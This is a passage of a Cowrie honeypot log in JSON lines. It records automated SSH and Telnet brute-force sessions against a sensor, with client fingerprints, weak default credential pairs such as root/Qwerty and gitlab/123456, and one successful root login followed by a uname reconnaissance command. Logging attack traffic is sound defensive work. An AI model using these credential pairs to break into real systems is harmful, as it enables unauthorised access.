m","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:04.959572Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:43:05.573441Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:43:05.963358Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:43:05.964170Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:06.109095Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:06.110417Z","src_ip":"212.227.235.229","session":"8fdcdbef08eb"}
{"eventid":"cowrie.session.closed","duration":31.01198172569275,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:09.241362Z","src_ip":"8.222.212.69","session":"a930c4cc5d8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46568,"dst_ip":"1.2.3.4","dst_port":22,"session":"6646f62c76f6","protocol":"ssh","message":"New connection: 212.227.125.160:46568 (1.2.3.4:22) [session: 6646f62c76f6]","sensor":"my-vps","timestamp":"2025-08-28T05:43:09.341783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:09.350752Z","src_ip":"212.227.125.160","session":"6646f62c76f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:09.471641Z","src_ip":"212.227.125.160","session":"6646f62c76f6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:43:09.862920Z","src_ip":"212.227.125.160","session":"6646f62c76f6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:11.103794Z","src_ip":"212.227.125.160","session":"6646f62c76f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37096,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bff084bfa55","protocol":"ssh","message":"New connection: 212.227.235.229:37096 (1.2.3.4:22) [session: 5bff084bfa55]","sensor":"my-vps","timestamp":"2025-08-28T05:43:17.362924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:17.363832Z","src_ip":"212.227.235.229","session":"5bff084bfa55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:17.506912Z","src_ip":"212.227.235.229","session":"5bff084bfa55"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:43:17.938456Z","src_ip":"212.227.235.229","session":"5bff084bfa55"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:19.084060Z","src_ip":"212.227.235.229","session":"5bff084bfa55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60408,"dst_ip":"1.2.3.4","dst_port":23,"session":"e92c304616b8","protocol":"telnet","message":"New connection: 212.227.235.229:60408 (1.2.3.4:23) [session: e92c304616b8]","sensor":"my-vps","timestamp":"2025-08-28T05:43:19.252816Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60434,"dst_ip":"1.2.3.4","dst_port":23,"session":"d24cb19e120f","protocol":"telnet","message":"New connection: 212.227.235.229:60434 (1.2.3.4:23) [session: d24cb19e120f]","sensor":"my-vps","timestamp":"2025-08-28T05:43:19.383253Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":58878,"dst_ip":"1.2.3.4","dst_port":23,"session":"363b25b70e05","protocol":"telnet","message":"New connection: 8.222.212.69:58878 (1.2.3.4:23) [session: 363b25b70e05]","sensor":"my-vps","timestamp":"2025-08-28T05:43:25.100724Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38078,"dst_ip":"1.2.3.4","dst_port":22,"session":"eccf3aec93ef","protocol":"ssh","message":"New connection: 212.227.235.229:38078 (1.2.3.4:22) [session: eccf3aec93ef]","sensor":"my-vps","timestamp":"2025-08-28T05:43:31.701812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:31.702468Z","src_ip":"212.227.235.229","session":"eccf3aec93ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:31.847824Z","src_ip":"212.227.235.229","session":"eccf3aec93ef"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T05:43:32.310836Z","src_ip":"212.227.235.229","session":"eccf3aec93ef"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:33.458657Z","src_ip":"212.227.235.229","session":"eccf3aec93ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35998,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa4c379cf84c","protocol":"ssh","message":"New connection: 212.227.125.160:35998 (1.2.3.4:22) [session: fa4c379cf84c]","sensor":"my-vps","timestamp":"2025-08-28T05:43:39.238100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:39.254764Z","src_ip":"212.227.125.160","session":"fa4c379cf84c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:39.367343Z","src_ip":"212.227.125.160","session":"fa4c379cf84c"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:43:39.765178Z","src_ip":"212.227.125.160","session":"fa4c379cf84c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:40.872627Z","src_ip":"212.227.125.160","session":"fa4c379cf84c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36530,"dst_ip":"1.2.3.4","dst_port":22,"session":"85ae263f8360","protocol":"ssh","message":"New connection: 212.227.235.229:36530 (1.2.3.4:22) [session: 85ae263f8360]","sensor":"my-vps","timestamp":"2025-08-28T05:43:46.353868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:46.354517Z","src_ip":"212.227.235.229","session":"85ae263f8360"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:46.502254Z","src_ip":"212.227.235.229","session":"85ae263f8360"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:43:46.940504Z","src_ip":"212.227.235.229","session":"85ae263f8360"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:48.088467Z","src_ip":"212.227.235.229","session":"85ae263f8360"}
{"eventid":"cowrie.session.closed","duration":31.695579290390015,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:51.078770Z","src_ip":"212.227.235.229","session":"d24cb19e120f"}
{"eventid":"cowrie.session.closed","duration":31.849610090255737,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:51.102354Z","src_ip":"212.227.235.229","session":"e92c304616b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45086,"dst_ip":"1.2.3.4","dst_port":22,"session":"3043364bdb23","protocol":"ssh","message":"New connection: 212.227.125.160:45086 (1.2.3.4:22) [session: 3043364bdb23]","sensor":"my-vps","timestamp":"2025-08-28T05:43:53.920813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:43:53.958243Z","src_ip":"212.227.125.160","session":"3043364bdb23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:43:54.054061Z","src_ip":"212.227.125.160","session":"3043364bdb23"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T05:43:54.460740Z","src_ip":"212.227.125.160","session":"3043364bdb23"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:55.660534Z","src_ip":"212.227.125.160","session":"3043364bdb23"}
{"eventid":"cowrie.session.closed","duration":33.52307319641113,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:43:58.623727Z","src_ip":"8.222.212.69","session":"363b25b70e05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37847,"dst_ip":"1.2.3.4","dst_port":23,"session":"fbc48e93ae18","protocol":"telnet","message":"New connection: 212.227.235.229:37847 (1.2.3.4:23) [session: fbc48e93ae18]","sensor":"my-vps","timestamp":"2025-08-28T05:43:59.393086Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58086,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae7b73de03e","protocol":"ssh","message":"New connection: 212.227.125.160:58086 (1.2.3.4:22) [session: 9ae7b73de03e]","sensor":"my-vps","timestamp":"2025-08-28T05:44:09.775104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:44:09.776095Z","src_ip":"212.227.125.160","session":"9ae7b73de03e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:44:09.884524Z","src_ip":"212.227.125.160","session":"9ae7b73de03e"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T05:44:10.660046Z","src_ip":"212.227.125.160","session":"9ae7b73de03e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:11.767245Z","src_ip":"212.227.125.160","session":"9ae7b73de03e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37690,"dst_ip":"1.2.3.4","dst_port":22,"session":"e05661a77551","protocol":"ssh","message":"New connection: 212.227.235.229:37690 (1.2.3.4:22) [session: e05661a77551]","sensor":"my-vps","timestamp":"2025-08-28T05:44:16.496949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:44:16.498217Z","src_ip":"212.227.235.229","session":"e05661a77551"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:44:16.642837Z","src_ip":"212.227.235.229","session":"e05661a77551"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T05:44:17.094781Z","src_ip":"212.227.235.229","session":"e05661a77551"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:44:18.241576Z","src_ip":"212.227.235.229","session":"e05661a77551"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33750,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb62fc3e77b6","protocol":"ssh","message":"New connection: 212.227.125.160:33750 (1.2.3.4:22) [session: eb62fc3e77b6]","sensor":"my-vps","timestamp":"2025-08-28T05:44:27.023430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:44:27.024305Z","src_ip":"212.227.125.160","session":"eb62fc3e77b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-